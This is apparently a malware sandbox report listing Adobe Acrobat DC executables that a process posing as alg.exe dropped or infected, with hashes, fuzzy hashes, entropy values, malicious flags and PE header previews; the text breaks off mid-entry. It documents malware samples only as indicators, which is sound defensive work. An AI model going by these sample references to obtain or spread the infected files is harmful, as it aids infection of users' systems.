Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...\|...\|...\|B..}...\|B..}...\|...}...\|..S\|...\|..}=..\|..}...\|..}...\|..}...\|..=\|...\|o..\|...\|B..}...\|...\|...\|..}...\|..Q\|...\|..9\|...\|..}...\|Rich...\|................PE..d......d.........."......H...........&.........@......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1461248
Entropy (8bit):	5.4686172655328535
Encrypted:	false
SSDEEP:	24576:Y5zhM1XSE6sqjnhMgeiCl7G0nehbGZpbD:mMs/Dmg27RnWGj
MD5:	1E504A51EF51B1609138808E85037453
SHA1:	3678BF727040C7E030F9E4C7AE596B61C912EFE5
SHA-256:	8985778E5FB8EDEF309E2AB1C666E0A26B5E4B3E6D47BCC2190C4359BEDCA0E3
SHA-512:	B2C9864EBF9FB6BFE078D8AB1AF2104EB8715A2C3CB52E3AFEBE194D267F5B048170C47F72679E5082AEF13EC0EFADF2DC1BA4885DCCEEA83934F1AC29E36539
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.......................................... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.499780023672939
Encrypted:	false
SSDEEP:	49152:TtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755VDmg27RN:TjEIa4HIEWOc5DD527BWG
MD5:	52707CF94BCED28D9B0FF24549C5BDCB
SHA1:	2902A4D0F9B9BDF2A3AA20FC8175A863F663EC69
SHA-256:	B3D93B9D05EF60FF4FA83274252DAAFEAA4A150F842E74AE0CD565F043DA842B
SHA-512:	A8A2DA5A47C8C004773AD15D94B8EA9989D4ED2A4010D49025AF472177971407C8107046ADD00046731FFA73E00E6EFC7565A421C0A777AB8C9CA331D9B7BEA5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......g?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999367288825598
Encrypted:	true
SSDEEP:	1572864:tQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:mXhwMhe6AABPiQwF6xQ22R
MD5:	9A274D8791F8128AD3C5DB4EAE48A5AB
SHA1:	AB508A5AACA0806A1B25A883386BF086951BC583
SHA-256:	2AB80DAB3CD81F6FB494DBC40F2207316A1672264F1C8508EC2BCBBC0DE35758
SHA-512:	9AE77C372A6DE302316FD1EBA055F7A65884869E0EFCD9BBD61C483D869B374C89C27F92895EFEBC02B049FB2528A8BC080DCDDC3DD47D3A27B034356D042E17
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......$.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1180160
Entropy (8bit):	5.084805345149149
Encrypted:	false
SSDEEP:	12288:aWXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:aqsqjnhMgeiCl7G0nehbGZpbD
MD5:	5FE26960617558276DF5D2A6A17DBAEB
SHA1:	A8F12A3ED4CDD9C1E45D40403C6D4E7ACB5E8303
SHA-256:	679028758D63CC827B98206EE41F465141A3FBB2BCD1965FDCF2FA003EEF5C0E
SHA-512:	097D3A2F4079A1495FFA96A76EE8D550887492B17C7B719C7E0FB0B0263DE8E9A93AE02BE1F4227D50AE9B06AD7D9F2C4CA3AEFDBB50FF892597F124E116EB43
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.\|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@............ .....................................................\|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6210048
Entropy (8bit):	6.386700069528037
Encrypted:	false
SSDEEP:	49152:yDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTX9:DnN9KfxLk6GEQTX5UKzNDkD527BWG
MD5:	3AB21774C5B4FD1016930DA0B39A4A51
SHA1:	80EAE011AC2FE5E26DF40223168EB2B85294880C
SHA-256:	E10B99B7173F1EB392FC6D6BCBF176417850F620DF34542C8951D275A03EF270
SHA-512:	A9ADC358EB0683E1CF8AC4506BB82F82160ED68D8F999549FFD95E3D3ED12200840C2749B67C0E960EF19ADA99E15CDACA19F78F5C078477519E7F7A24677275
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9\|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9\|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.\|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1157120
Entropy (8bit):	5.041484847271702
Encrypted:	false
SSDEEP:	12288:XyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:XysqjnhMgeiCl7G0nehbGZpbD
MD5:	0AFF75EF0352E6576D2936A57DC0AC7E
SHA1:	27A63740C7402624947B7B9C510BC05B89134D78
SHA-256:	4F2756DF0D7675E03205A471DC9BC75472A71A435C6AE99ABE4FE79738C35FEF
SHA-512:	6648A2CD2D4990620588FBF767DA2A7B03873836750F221A2A48848EBC5FE0AB041D39BC834A6D40779B9442EA91E0ED4D350A4382A0360EC29E88B15EECCBFC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........\|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12039168
Entropy (8bit):	6.596677452612494
Encrypted:	false
SSDEEP:	98304:db+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKFD527BWG:hnPgTHIwZoRBk9DdhSUEVIXgKFVQBWG
MD5:	0C860AD353B3B125124C7A18786B73B4
SHA1:	84D802EC1E5AA189E713F6A4523A06CA875CA643
SHA-256:	7E0CC98E11EFF2BE8D01DDCDA1AF456533933A55D5859DAE532EE0BD04A1D6B2
SHA-512:	4E66A5FF6286975993754757AD2BA48137A1F3F735C8BB2E98B0CBD66B0A777A9C22D3B46C775BC7653BAB89ED462CBCA80A53176DAF07A7C6B2C8B31F5057F3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...\|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................c.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......\|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1322496
Entropy (8bit):	5.281817612276051
Encrypted:	false
SSDEEP:	24576:Bg5FvCPusBsqjnhMgeiCl7G0nehbGZpbD:WftqDmg27RnWGj
MD5:	48AA62F59CD9DF8C50C62F09038D5F54
SHA1:	4664ECD8DB4BCBDAA8AD1E09011B0233220AF336
SHA-256:	9717043B03475378871059D34DFBA8C81BCD5961A7974642675BAD433CACC941
SHA-512:	DD432C59F664D6B34B433BE5EAB2FA45915EA228C283E68522FEA80D92420378ED500B9D2460730774006550834ED061E84AB2414B18C75F45EF649FDBE3EB80
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1339904
Entropy (8bit):	7.208885954630813
Encrypted:	false
SSDEEP:	24576:PjKTIsAjFuvtIfmFthMaT5U8aChaeuDsqjnhMgeiCl7G0nehbGZpbD:PjIMmPh7TT79yDmg27RnWGj
MD5:	63F92C4C26868D108B6B28BA4892655B
SHA1:	3F1B331CA93F8D5D441AFAA0001D548CD9837B64
SHA-256:	BF3E40F22EF00EBCC2CA6E2E5DB4E3AFE31D963DEF96199406F6E4EC848EAF6C
SHA-512:	E075C2480E407669AD7DB8026FC68F14D39FBACEA9FB009FD4ADA2C3764497A95D2D0C7483336F9A113219A08572B7EE801E9B7FF3DF394D02A14B49C0750A8C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1515520
Entropy (8bit):	5.411765492545051
Encrypted:	false
SSDEEP:	24576:2GqVwCto1Gm5WgHsqjnhMgeiCl7G0nehbGZpbD:DZ1GmUUDmg27RnWGj
MD5:	BCA2788EFD21B6CC8B9C9EA723B356F6
SHA1:	0CBF25F35DD7DCFBEA82D8DAD6BCBBDF4B8228A7
SHA-256:	60E4139C5749A42A056EBFD9C2131CABC1B9715A225D01C5202D3F3B0C986C03
SHA-512:	DDFBF52A5BD620244E093F55429CDAFAAEE85DE83702A314BFD4BAE0147E2664B0945DA04CECFCBC97048FF67360CB396EC708D6FB9592C70F7C7A357EA952E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1253376
Entropy (8bit):	5.157405525960229
Encrypted:	false
SSDEEP:	12288:wWBWjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wWBWjsqjnhMgeiCl7G0nehbGZpbD
MD5:	3232CEFA51D0D84FA80C1E6445B229BE
SHA1:	6F9A4EEEE7ACDAB75CA16B666A36CD7733F7D2F9
SHA-256:	E9CF72ED592738B18D87636884F9F29C93834AB680A6A3B3F0509E6B157235B9
SHA-512:	69A1B3CAB049A71B9F331C0049A4FBD09411A53CF3032E4B911CAF80F2C6E79976B99998B7BEC1B3584BEBFA39F83C0BB4925DBABAF4F7CCD319B8D83168B436
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	7.228486047237038
Encrypted:	false
SSDEEP:	24576:bf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0UsqjnhMgeiCl7G0nehbGZpbDl:b+GtCi27mVTyT+a0wDmg27RnWGjN
MD5:	5A6BD28498F1AAA89D69F360DD2BC4E6
SHA1:	F76035A2335741A20AF9A31A5D03F08108791CCA
SHA-256:	1524D7A8746E95D2E786DDD4704DE47AC5D10A395DEF516F44BF6C4FC09C986E
SHA-512:	60D220F90C65111F68F497430E5581E71BB081BE8EFBE69FF22929A43AA1DB72BBDAF7D8D181DB1AA414069CC9F1DF99D795339CC09220AFAC77048342080A89
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3110912
Entropy (8bit):	6.649654695066131
Encrypted:	false
SSDEEP:	49152:4U198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYjDmg27RnWGj:J2NfHOIK5Ns6qR95D527BWG
MD5:	899D12BB669C4FC3B647C99931F9B142
SHA1:	FBF78023654721601E8ADB7088398F2A2E587712
SHA-256:	317667C0866B64BBF0AE9695A7D6CE3FFACCBDE13C7F727E724C0B21E8E5909F
SHA-512:	4A58C850C9039288D02DED7348AB3DC7C5071BC8D9CB57CA81F65A9C2C5F151EB398A2C21409AC4C38CFBB212791E2C296E68FE05A386C37319BFA02B8907F75
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0.....`./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1588224
Entropy (8bit):	5.531909535100647
Encrypted:	false
SSDEEP:	24576:6kcWTUQcyd3sqjnhMgeiCl7G0nehbGZpbD:6hKUoDmg27RnWGj
MD5:	B0554DF901AA8D7F42D7DE364AAF3AA9
SHA1:	A854EC18DBB59B3AC23A33BFCDA7A12B35A7D018
SHA-256:	CCA2579A145AF95EEE6E78FBCA2CBF4BF97140BC527AD90B64BA02F21E289D27
SHA-512:	DBE3DEAA92CD127C1B89685B1C3EE4610BB0B739EBA09B26E3A0C4F659520CC9D4E476316630FFC37210C2DDCF75789D840D0C7376E2C8EFAA365388A6436F26
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@......................................... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1338368
Entropy (8bit):	5.35266432616946
Encrypted:	false
SSDEEP:	12288:WfY+FUBkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WA+qBksqjnhMgeiCl7G0nehbGZpbD
MD5:	5865F4C40446FCCFA155C72DB2C2F781
SHA1:	3A7EF093616AB80DE32F3F58835FB33FC9DA1127
SHA-256:	56A96046EB207B38D5D7F0D93D7965A2C1A0BF9F487EFAF6D9EEB7DED32083AF
SHA-512:	46C049AD9EE6A07ED81CAE5058A6C977213897A0E22C12FA6D06BE9AA768072BEC488EAB216AA4FA9A328A98A7714BA3BC2119314451F25832FACAD2CBCFBE8D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................lj..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1143296
Entropy (8bit):	5.02266547868689
Encrypted:	false
SSDEEP:	12288:dXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dsqjnhMgeiCl7G0nehbGZpbD
MD5:	8B71046F0D44482610872999D140E391
SHA1:	4FF4F35280D4580E1AF67D18405A01A24860196A
SHA-256:	E24274EE7D3C72F81C215C4BD69C2C1BAF5A2F02F7609CD7C9CB6CFFABC07C25
SHA-512:	C9DD26355BAAE71D0638079E9D9ABB67F6DF5170BC628F61CFA56BA89FACA95390B5AA34CE2FE2AF3DA85195362A1FAB956B30AC22DA9155FB627CE5C2BF43C2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................Um.... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...\|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1161728
Entropy (8bit):	5.047155930044599
Encrypted:	false
SSDEEP:	12288:54Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:6sqjnhMgeiCl7G0nehbGZpbD
MD5:	F70552D5EC11C91F438F6D4AEBF76C5F
SHA1:	F9E37FC1A2CC8E6CF98F861EFCFAAFE16DD57060
SHA-256:	2397AB6AAFDFB1F0760C37A808484F163CA6000EE772FDF75E1365A6F944A803
SHA-512:	A3F6B16CAA0DD8823584143E6A7045C98C7C5C3323D2E4296044E6AB6CE91C49BD4B402070B2F559D8192A572BA435263411E9E9C5E93539D8A5837B520634DF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..\|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@....................................NC.... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.499781905475844
Encrypted:	false
SSDEEP:	49152:UtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755VDmg27RN:UjEIa4HIEWOc5DD527BWG
MD5:	1E57719BDE81CE0E81771D9976F84A17
SHA1:	FB234B102D1C3DDB0726F82213580A38150CD716
SHA-256:	DA56A20127B206E59E27743553CF35D936A61085EED976C544E2348BA621E4F0
SHA-512:	D57B34A3E5448D33C5B18830E916A44EE6BAA22D3C16B8AF9C54B2374F037B7FD8605609BF972A7DB763E0BF97A95E11EF62C2E801BBAB59996DC22B9258CA98
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....Y.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999367300904618
Encrypted:	true
SSDEEP:	1572864:PQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:YXhwMhe6AABPiQwF6xQ22R
MD5:	37820C6C32DA7A89BC0891E00C3D61F7
SHA1:	18CBD0553946751381449D0890B2AA747A13F56C
SHA-256:	4BC103ADD5B06E68E4A89D15E3118D43301E0A47303B4BD589EB268D1DCA4B18
SHA-512:	05AF7A3C05A5D113680CEBEC349F80888AC8694FB79B4AEB8B543B855A8AC2BB53CD34CA7BCFD29D81665FCFF2AEF959F3C436AE81E880792FFC2159FC3F66C3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......D.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1230336
Entropy (8bit):	5.185590386081266
Encrypted:	false
SSDEEP:	12288:ZejVWYUA4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:EjkY74sqjnhMgeiCl7G0nehbGZpbD
MD5:	4A47C6FDAF693750BDCFA5A0FBB9F582
SHA1:	4E0C6850630C583A1477F4168EE3E73791996E32
SHA-256:	C166893533CB0C68C7CA1BCAFBF9BF8665F15D959A646639A0CAE1FCDB4EA7C1
SHA-512:	FBA889F1B5516F42B65DF1CF069B873464ABB427E3DC8F14B22E1FE3B5C65B5C6BD83F9DCE81935EE6DBBD02F157F98B8E1171EA6631B25F44C2527FF03677B6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.................................e........................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1384960
Entropy (8bit):	5.377813053938689
